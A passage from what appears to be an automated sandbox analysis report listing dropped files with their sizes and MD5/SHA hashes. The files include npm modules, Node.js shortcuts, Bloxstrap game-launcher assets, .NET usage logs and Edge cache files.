                                                                                                                                                                        8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        730B

                                                                                                                                                                        MD5

                                                                                                                                                                        072ac9ab0c4667f8f876becedfe10ee0

                                                                                                                                                                        SHA1

                                                                                                                                                                        0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                                                                                                                                        SHA256

                                                                                                                                                                        2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                                                                                                                                        SHA512

                                                                                                                                                                        f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d116a360376e31950428ed26eae9ffd4

                                                                                                                                                                        SHA1

                                                                                                                                                                        192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

                                                                                                                                                                        SHA256

                                                                                                                                                                        c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

                                                                                                                                                                        SHA512

                                                                                                                                                                        5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        802B

                                                                                                                                                                        MD5

                                                                                                                                                                        d7c8fab641cd22d2cd30d2999cc77040

                                                                                                                                                                        SHA1

                                                                                                                                                                        d293601583b1454ad5415260e4378217d569538e

                                                                                                                                                                        SHA256

                                                                                                                                                                        04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

                                                                                                                                                                        SHA512

                                                                                                                                                                        278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                        MD5

                                                                                                                                                                        bc0c0eeede037aa152345ab1f9774e92

                                                                                                                                                                        SHA1

                                                                                                                                                                        56e0f71900f0ef8294e46757ec14c0c11ed31d4e

                                                                                                                                                                        SHA256

                                                                                                                                                                        7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

                                                                                                                                                                        SHA512

                                                                                                                                                                        5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        780B

                                                                                                                                                                        MD5

                                                                                                                                                                        b020de8f88eacc104c21d6e6cacc636d

                                                                                                                                                                        SHA1

                                                                                                                                                                        20b35e641e3a5ea25f012e13d69fab37e3d68d6b

                                                                                                                                                                        SHA256

                                                                                                                                                                        3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

                                                                                                                                                                        SHA512

                                                                                                                                                                        4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        763B

                                                                                                                                                                        MD5

                                                                                                                                                                        7428aa9f83c500c4a434f8848ee23851

                                                                                                                                                                        SHA1

                                                                                                                                                                        166b3e1c1b7d7cb7b070108876492529f546219f

                                                                                                                                                                        SHA256

                                                                                                                                                                        1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

                                                                                                                                                                        SHA512

                                                                                                                                                                        c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f0bd53316e08991d94586331f9c11d97

                                                                                                                                                                        SHA1

                                                                                                                                                                        f5a7a6dc0da46c3e077764cfb3e928c4a75d383e

                                                                                                                                                                        SHA256

                                                                                                                                                                        dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef

                                                                                                                                                                        SHA512

                                                                                                                                                                        fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        771B

                                                                                                                                                                        MD5

                                                                                                                                                                        1d7c74bcd1904d125f6aff37749dc069

                                                                                                                                                                        SHA1

                                                                                                                                                                        21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab

                                                                                                                                                                        SHA256

                                                                                                                                                                        24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9

                                                                                                                                                                        SHA512

                                                                                                                                                                        b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

                                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

                                                                                                                                                                        Filesize

                                                                                                                                                                        168B

                                                                                                                                                                        MD5

                                                                                                                                                                        db7dbbc86e432573e54dedbcc02cb4a1

                                                                                                                                                                        SHA1

                                                                                                                                                                        cff9cfb98cff2d86b35dc680b405e8036bbbda47

                                                                                                                                                                        SHA256

                                                                                                                                                                        7cf8a9c96f9016132be81fd89f9573566b7dc70244a28eb59d573c2fdba1def9

                                                                                                                                                                        SHA512

                                                                                                                                                                        8f35f2e7dac250c66b209acecab836d3ecf244857b81bacebc214f0956ec108585990f23ff3f741678e371b0bee78dd50029d0af257a3bb6ab3b43df1e39f2ec

                                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url

                                                                                                                                                                        Filesize

                                                                                                                                                                        133B

                                                                                                                                                                        MD5

                                                                                                                                                                        35b86e177ab52108bd9fed7425a9e34a

                                                                                                                                                                        SHA1

                                                                                                                                                                        76a1f47a10e3ab829f676838147875d75022c70c

                                                                                                                                                                        SHA256

                                                                                                                                                                        afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

                                                                                                                                                                        SHA512

                                                                                                                                                                        3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Modifications\ClientSettings\ClientAppSettings.json

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                        MD5

                                                                                                                                                                        24ed8edda5466a8dfe632b66064499aa

                                                                                                                                                                        SHA1

                                                                                                                                                                        a5ff183224a763907b3ae04247c1d047515c45ff

                                                                                                                                                                        SHA256

                                                                                                                                                                        f2bbc515dd7438cf98d353d176fa64a479c18d2bffc3b6048c58b14c140cadb3

                                                                                                                                                                        SHA512

                                                                                                                                                                        f1fd2edfb9d47c5bece272676f6692ba537a5371cb8a2486ba6825f0f88282169fecd9911476ccf6bd42bddeab71e24f91318e1671af34cdf020a1f43e3e8197

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Modifications\content\sounds\action_falling.mp3

                                                                                                                                                                        Filesize

                                                                                                                                                                        36KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c48c0f1f12b88868bdfa5dbe93625773

                                                                                                                                                                        SHA1

                                                                                                                                                                        7e0ce4bff82981d945087fd9411281f740e2a398

                                                                                                                                                                        SHA256

                                                                                                                                                                        7a5e846a8fefe27ea1cd500f46bb63583b45fb86596a3a7561a186a14d1ab147

                                                                                                                                                                        SHA512

                                                                                                                                                                        b15f9a96a7a0687219ba0aef84e35001e8afbb32e41a4e3e7b93b8e4080fc31cbf09de32e219498723438d26adcbe4b0f0685a095af078882ce94dcff0bac2fc

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Modifications\content\sounds\action_jump.mp3

                                                                                                                                                                        Filesize

                                                                                                                                                                        5KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5e8ac4372fe9cb87a43722142d2d4e3b

                                                                                                                                                                        SHA1

                                                                                                                                                                        d7e9a6f1616fb86cc27dd567c42b19500cdeb7a5

                                                                                                                                                                        SHA256

                                                                                                                                                                        7a6538ea47940710cec9e1695284e8eb751198324d089b26ed52992f69cc2607

                                                                                                                                                                        SHA512

                                                                                                                                                                        72e21431a782ea1a882e3525a83cb22439c1c72f2d14154fa2e080fb682aa1a54fa32dc90d423b74def21cd7a76d7f1baf6d77c5d0823f04e7cb8fa81c73db47

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\ExtraContent\places\Mobile.rbxl

                                                                                                                                                                        Filesize

                                                                                                                                                                        157KB

                                                                                                                                                                        MD5

                                                                                                                                                                        34cf579311f6f9a358bea63c563bf5f0

                                                                                                                                                                        SHA1

                                                                                                                                                                        c8681c2e32f8c102c736495533e9f3a3fc533fe2

                                                                                                                                                                        SHA256

                                                                                                                                                                        70604d44c691309d79035b2695a0ce2efcdc41adcc764e78542eefb52319e20f

                                                                                                                                                                        SHA512

                                                                                                                                                                        6bedf5e296cb7dcf4a2930e4ca9522bece02a76673a7d052cc6a6c3eb982a054c8a842aa74bfad9d60af505e930757d8ef257ab56e0d261a348ba74b25bd8f3e

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\ExtraContent\textures\ui\LuaApp\graphic\shimmer_lightTheme.png

                                                                                                                                                                        Filesize

                                                                                                                                                                        20KB

                                                                                                                                                                        MD5

                                                                                                                                                                        4f8f43c5d5c2895640ed4fdca39737d5

                                                                                                                                                                        SHA1

                                                                                                                                                                        fb46095bdfcab74d61e1171632c25f783ef495fa

                                                                                                                                                                        SHA256

                                                                                                                                                                        fc57f32c26087eef61b37850d60934eda1100ca8773f08e487191a74766053d1

                                                                                                                                                                        SHA512

                                                                                                                                                                        7aebc0f79b2b23a76fb41df8bab4411813ffb1abc5e2797810679c0eaa690e7af7561b8473405694bd967470be337417fa42e30f0318acbf171d8f31620a31aa

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\ExtraContent\textures\ui\LuaApp\graphic\[email protected]

                                                                                                                                                                        Filesize

                                                                                                                                                                        71KB

                                                                                                                                                                        MD5

                                                                                                                                                                        3fec0191b36b9d9448a73ff1a937a1f7

                                                                                                                                                                        SHA1

                                                                                                                                                                        bee7d28204245e3088689ac08da18b43eae531ba

                                                                                                                                                                        SHA256

                                                                                                                                                                        1a03e6f6a0de045aa588544c392d671c040b82a5598b4246af04f5a74910dc89

                                                                                                                                                                        SHA512

                                                                                                                                                                        a8ab2bc2d937963af36d3255c6ea09cae6ab1599996450004bb18e8b8bdfbdde728821ac1662d8a0466680679011d8f366577b143766838fe91edf08a40353ce

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\ExtraContent\textures\ui\LuaDiscussions\buttonFill.png

                                                                                                                                                                        Filesize

                                                                                                                                                                        247B

                                                                                                                                                                        MD5

                                                                                                                                                                        81ce54dfd6605840a1bd2f9b0b3f807d

                                                                                                                                                                        SHA1

                                                                                                                                                                        4a3a4c05b9c14c305a8bb06c768abc4958ba2f1c

                                                                                                                                                                        SHA256

                                                                                                                                                                        0a6a5cafb4dee0d8c1d182ddec9f68ca0471d7fc820cf8dc2d68f27a35cd3386

                                                                                                                                                                        SHA512

                                                                                                                                                                        57069c8ac03dd0fdfd97e2844c19138800ff6f7d508c26e5bc400b30fe78baa0991cc39f0f86fa10cd5d12b6b11b0b09c1a770e5cb2fdca157c2c8986a09e5ff

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\configs\DateTimeLocaleConfigs\zh-hans.json

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        fb6605abd624d1923aef5f2122b5ae58

                                                                                                                                                                        SHA1

                                                                                                                                                                        6e98c0a31fa39c781df33628b55568e095be7d71

                                                                                                                                                                        SHA256

                                                                                                                                                                        7b993133d329c46c0c437d985eead54432944d7b46db6ad6ea755505b8629d00

                                                                                                                                                                        SHA512

                                                                                                                                                                        97a14eda2010033265b379aa5553359293baf4988a4cdde8a40b0315e318a7b30feee7f5e14c68131e85610c00585d0c67e636999e3af9b5b2209e1a27a82223

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\configs\DateTimeLocaleConfigs\zh-tw.json

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        702c9879f2289959ceaa91d3045f28aa

                                                                                                                                                                        SHA1

                                                                                                                                                                        775072f139acc8eafb219af355f60b2f57094276

                                                                                                                                                                        SHA256

                                                                                                                                                                        a92a6988175f9c1d073e4b54bf6a31f9b5d3652eebdf6a351fb5e12bda76cbd5

                                                                                                                                                                        SHA512

                                                                                                                                                                        815a6bef134c0db7a5926f0cf4b3f7702d71b0b2f13eca9539cd2fc5a61eea81b1884e4c4bc0b3398880589bff809ac8d5df833e7e4aeda4a1244e9a875d1e97

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\sounds\action_footsteps_plastic.mp3

                                                                                                                                                                        Filesize

                                                                                                                                                                        29KB

                                                                                                                                                                        MD5

                                                                                                                                                                        08bcdedf21b7843a0554c57e33357fdd

                                                                                                                                                                        SHA1

                                                                                                                                                                        36498057f481df17f2a208a8d86ac0004e6d5469

                                                                                                                                                                        SHA256

                                                                                                                                                                        11da1dda2276b4a29315b0f91ed6deb29d309e5ffe4fde256a80b86534043e28

                                                                                                                                                                        SHA512

                                                                                                                                                                        15bc4d55d5e8915cc427f4d19011598d224e7053d94ee04acb53b30e8f4e9880665e2108d87f09b59716252d35230340e99422f488f952d287328f18b9929280

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\sounds\action_get_up.mp3

                                                                                                                                                                        Filesize

                                                                                                                                                                        6KB

                                                                                                                                                                        MD5

                                                                                                                                                                        fffb71b8be5f1d71eb040b22068d61f5

                                                                                                                                                                        SHA1

                                                                                                                                                                        d675c8d5568e67e85cd7dc03d191832349155a12

                                                                                                                                                                        SHA256

                                                                                                                                                                        6134552f737b81230d42e17f3b32a8e30d0943cb2fab5f4fac756c2f0e3213bb

                                                                                                                                                                        SHA512

                                                                                                                                                                        adeb26967e37ccffa400952c4112ab850d8475f95c87827c84dbb34b19a56acd0b88a56eda3afcc244136b05d826ea964406e67177adbe6d6ebd3cff89a87735

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\sounds\ouch.ogg

                                                                                                                                                                        Filesize

                                                                                                                                                                        6KB

                                                                                                                                                                        MD5

                                                                                                                                                                        9404c52d6f311da02d65d4320bfebb59

                                                                                                                                                                        SHA1

                                                                                                                                                                        0b5b5c2e7c631894953d5828fec06bdf6adba55f

                                                                                                                                                                        SHA256

                                                                                                                                                                        c9775e361392877d1d521d0450a5368ee92d37dc542bc5e514373c9d5003f317

                                                                                                                                                                        SHA512

                                                                                                                                                                        22aa1acbcdcf56f571170d9c32fd0d025c50936387203a7827dbb925f352d2bc082a8a79db61c2d1f1795ad979e93367c80205d9141b73d806ae08fa089837c4

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\Cursors\KeyboardMouse\IBeamCursor.png

                                                                                                                                                                        Filesize

                                                                                                                                                                        292B

                                                                                                                                                                        MD5

                                                                                                                                                                        464c4983fa06ad6cf235ec6793de5f83

                                                                                                                                                                        SHA1

                                                                                                                                                                        8afeb666c8aee7290ab587a2bfb29fc3551669e8

                                                                                                                                                                        SHA256

                                                                                                                                                                        99fd7f104948c6ab002d1ec69ffd6c896c91f9accc499588df0980b4346ecbed

                                                                                                                                                                        SHA512

                                                                                                                                                                        f805f5f38535fe487b899486c8de6cf630114964e2c3ebc2af7152a82c6f6faef681b4d936a1867b5dff6566b688b5c01105074443cc2086b3fe71f7e6e404b1

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\StudioToolbox\Clear.png

                                                                                                                                                                        Filesize

                                                                                                                                                                        538B

                                                                                                                                                                        MD5

                                                                                                                                                                        fa8eaf9266c707e151bb20281b3c0988

                                                                                                                                                                        SHA1

                                                                                                                                                                        3ca097ad4cd097745d33d386cc2d626ece8cb969

                                                                                                                                                                        SHA256

                                                                                                                                                                        8cf08bf7e50fea7b38f59f162ed956346c55a714ed8a9a8b0a1ada7e18480bc2

                                                                                                                                                                        SHA512

                                                                                                                                                                        e29274300eab297c6de895bb39170f73f0a4ffa2a8c3732caeeeac16e2c25fb58bb401fdd5823cc62d9c413ec6c43d7c46861d7e14d52f8d9d8ff632e29f167c

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\StudioUIEditor\valueBoxRoundedRectangle.png

                                                                                                                                                                        Filesize

                                                                                                                                                                        130B

                                                                                                                                                                        MD5

                                                                                                                                                                        521fb651c83453bf42d7432896040e5e

                                                                                                                                                                        SHA1

                                                                                                                                                                        8fdbf2cc2617b5b58aaa91b94b0bf755d951cad9

                                                                                                                                                                        SHA256

                                                                                                                                                                        630303ec4701779eaf86cc9fbf744b625becda53badc7271cbb6ddc56e638d70

                                                                                                                                                                        SHA512

                                                                                                                                                                        8fa0a50e52a3c7c53735c7dd7af275ebc9c1843f55bb30ebe0587a85955a8da94ff993822d233f7ed118b1070a7d67718b55ba4a597dc49ed2bf2a3836c696f6

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\TerrainTools\checkbox_square.png

                                                                                                                                                                        Filesize

                                                                                                                                                                        985B

                                                                                                                                                                        MD5

                                                                                                                                                                        2cb16991a26dc803f43963bdc7571e3f

                                                                                                                                                                        SHA1

                                                                                                                                                                        12ad66a51b60eeaed199bc521800f7c763a3bc7b

                                                                                                                                                                        SHA256

                                                                                                                                                                        c7bae6d856f3bd9f00c122522eb3534d0d198a9473b6a379a5c3458181870646

                                                                                                                                                                        SHA512

                                                                                                                                                                        4c9467e5e2d83b778d0fb8b6fd97964f8d8126f07bfd50c5d68c256703f291ceaed56be057e8e2c591b2d2c49f6b7e099a2b7088d0bf5bdd901433459663b1f8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\ui\Controls\XboxController\Thumbstick1.png

                                                                                                                                                                        Filesize

                                                                                                                                                                        641B

                                                                                                                                                                        MD5

                                                                                                                                                                        2cbe38df9a03133ddf11a940c09b49cd

                                                                                                                                                                        SHA1

                                                                                                                                                                        6fb5c191ed8ce9495c66b90aaf53662bfe199846

                                                                                                                                                                        SHA256

                                                                                                                                                                        0835a661199a7d8df7249e8ae925987184efcc4fb85d9efac3cc2c1495020517

                                                                                                                                                                        SHA512

                                                                                                                                                                        dcef5baccef9fff632456fe7bc3c4f4a403363d9103a8047a55f4bd4c413d0c5f751a2e37385fe9eba7a420dbdb77ca2ff883d47fcdd35af222191cc5bd5c7a9

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\ui\Controls\XboxController\[email protected]

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        e8c88cf5c5ef7ae5ddee2d0e8376b32f

                                                                                                                                                                        SHA1

                                                                                                                                                                        77f2a5b11436d247d1acc3bac8edffc99c496839

                                                                                                                                                                        SHA256

                                                                                                                                                                        9607af14604a8e8eb1dec45d3eeca01fed33140c0ccc3e6ef8ca4a1f6219b5dd

                                                                                                                                                                        SHA512

                                                                                                                                                                        32f5a1e907705346a56fbddfe0d8841d05415ff7abe28ae9281ba46fedf8270b982be0090b72e2e32de0ce36e21934f80eaf508fd010f7ab132d39f5305fb68f

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\ui\Controls\XboxController\[email protected]

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        499333dae156bb4c9e9309a4842be4c8

                                                                                                                                                                        SHA1

                                                                                                                                                                        d18c4c36bdb297208589dc93715560acaf761c3a

                                                                                                                                                                        SHA256

                                                                                                                                                                        d35a74469f1436f114c27c730a5ec0793073bcf098db37f10158d562a3174591

                                                                                                                                                                        SHA512

                                                                                                                                                                        91c64173d2cdabc045c70e0538d45e1022cc74ec04989565b85f0f26fe3e788b700a0956a07a8c91d34c06fc1b7fad43bbdbb41b0c6f15b9881c3e46def8103e

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\ui\Controls\XboxController\Thumbstick2.png

                                                                                                                                                                        Filesize

                                                                                                                                                                        738B

                                                                                                                                                                        MD5

                                                                                                                                                                        a402aacac8be906bcc07d50669d32061

                                                                                                                                                                        SHA1

                                                                                                                                                                        9d75c1afbe9fc482983978cae4c553aa32625640

                                                                                                                                                                        SHA256

                                                                                                                                                                        62a313b6cc9ffe7dd86bc9c4fcd7b8e8d1f14a15cdf41a53fb69af4ae3416102

                                                                                                                                                                        SHA512

                                                                                                                                                                        d11567bcaad8bbd9e2b9f497c3215102c7e7546caf425e93791502d3d2b3f78dec13609796fcd6e1e7f5c7d794bac074d00a74001e7fe943d63463b483877546

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\ui\Controls\XboxController\[email protected]

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        83e9b7823c0a5c4c67a603a734233dec

                                                                                                                                                                        SHA1

                                                                                                                                                                        2eaf04ad636bf71afdf73b004d17d366ac6d333e

                                                                                                                                                                        SHA256

                                                                                                                                                                        3b5e06eb1a89975def847101f700f0caa60fe0198f53e51974ef1608c6e1e067

                                                                                                                                                                        SHA512

                                                                                                                                                                        e8abb39a1ec340ac5c7d63137f607cd09eae0e885e4f73b84d8adad1b8f574155b92fbf2c9d3013f64ebbb6d55ead5419e7546b0f70dcde976d49e7440743b0f

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\content\textures\ui\Controls\XboxController\[email protected]

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        55b64987636b9740ab1de7debd1f0b2f

                                                                                                                                                                        SHA1

                                                                                                                                                                        96f67222ce7d7748ec968e95a2f6495860f9d9c9

                                                                                                                                                                        SHA256

                                                                                                                                                                        f4a6bb3347ee3e603ea0b2f009bfa802103bc434ae3ff1db1f2043fa8cace8fc

                                                                                                                                                                        SHA512

                                                                                                                                                                        73a88a278747de3fefbaabb3ff90c1c0750c8d6c17746787f17061f4eff933620407336bf9b755f4222b0943b07d8c4d01de1815d42ea65e78e0daa7072591e9

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        b4e91d2e5f40d5e2586a86cf3bb4df24

                                                                                                                                                                        SHA1

                                                                                                                                                                        31920b3a41aa4400d4a0230a7622848789b38672

                                                                                                                                                                        SHA256

                                                                                                                                                                        5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210

                                                                                                                                                                        SHA512

                                                                                                                                                                        968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        226B

                                                                                                                                                                        MD5

                                                                                                                                                                        4ae344179932dc8e2c6fe2079f9753ef

                                                                                                                                                                        SHA1

                                                                                                                                                                        60eacc624412b1f34809780769e3b212f138ea9c

                                                                                                                                                                        SHA256

                                                                                                                                                                        3063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4

                                                                                                                                                                        SHA512

                                                                                                                                                                        fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        627073ee3ca9676911bee35548eff2b8

                                                                                                                                                                        SHA1

                                                                                                                                                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                                                                        SHA256

                                                                                                                                                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        562b59fd3a3527ef4e850775b15d0836

                                                                                                                                                                        SHA1

                                                                                                                                                                        ffd14d901f78138fc2eece97c5e258b251bc6752

                                                                                                                                                                        SHA256

                                                                                                                                                                        0a64863cb40f9d3b13a7b768b62e8b4707dfee1d3e86a07e999acb87bd7d3430

                                                                                                                                                                        SHA512

                                                                                                                                                                        ef9fd3d83ab85b18cf0e0d17e2c7d71936f783e3ae38005e5c78742560332f88be7c4c936d4dc4179e93fde0240d2882d71ef7038289c8cbddbfc4790c0603c2

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        c1ff2a88b65e524450bf7c721960d7db

                                                                                                                                                                        SHA1

                                                                                                                                                                        382c798fcd7782c424d93262d79e625fcb5f84aa

                                                                                                                                                                        SHA256

                                                                                                                                                                        2d12365f3666f6e398456f0c441317bc8ad3e7b089feacc14756e2ae87379409

                                                                                                                                                                        SHA512

                                                                                                                                                                        f19c08edf1416435a7628064d85f89c643c248d0979ece629b882f600956f0d8cd93efbe253fa3ec61ad205233a8804807600f845e53e5ed8949290b80fe42d3

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

                                                                                                                                                                        Filesize

                                                                                                                                                                        98KB

                                                                                                                                                                        MD5

                                                                                                                                                                        89696c24eb8c4e6f5cbaf5fe074b0397

                                                                                                                                                                        SHA1

                                                                                                                                                                        af18adce6a0cbde6e7307c4826778641585d9f0a

                                                                                                                                                                        SHA256

                                                                                                                                                                        7cb8576e735de94b95292ce653e246b574a97f4c619603aaff91b9d2e48e9cd4

                                                                                                                                                                        SHA512

                                                                                                                                                                        e6e4620f6229d5b03e61910448c34fc776633a67f952d58af23fca59a99eabebf00efd02c6118eec4725ae0958a8cd38dc2897350491e6827340d4ad76400839

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000039

                                                                                                                                                                        Filesize

                                                                                                                                                                        51KB

                                                                                                                                                                        MD5

                                                                                                                                                                        0a7c0eb14fb4f288d5c61cba111e3dc3

                                                                                                                                                                        SHA1

                                                                                                                                                                        48f6448938e1b8df723a9f7c6490a78887f240c6

                                                                                                                                                                        SHA256

                                                                                                                                                                        8bef2cb55b40f46f7e2fadfe280e4c41b71a657081858a8224c6fb639d910e4e

                                                                                                                                                                        SHA512

                                                                                                                                                                        a63a2651e36b03846d5818a4e03f7582ce95a34d9b4d4be9a5ee152ce22c305a14fec2618aa3f904495bed4c94a3256951ba75dbb0fd0386b3f570096ad4226b

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000e0

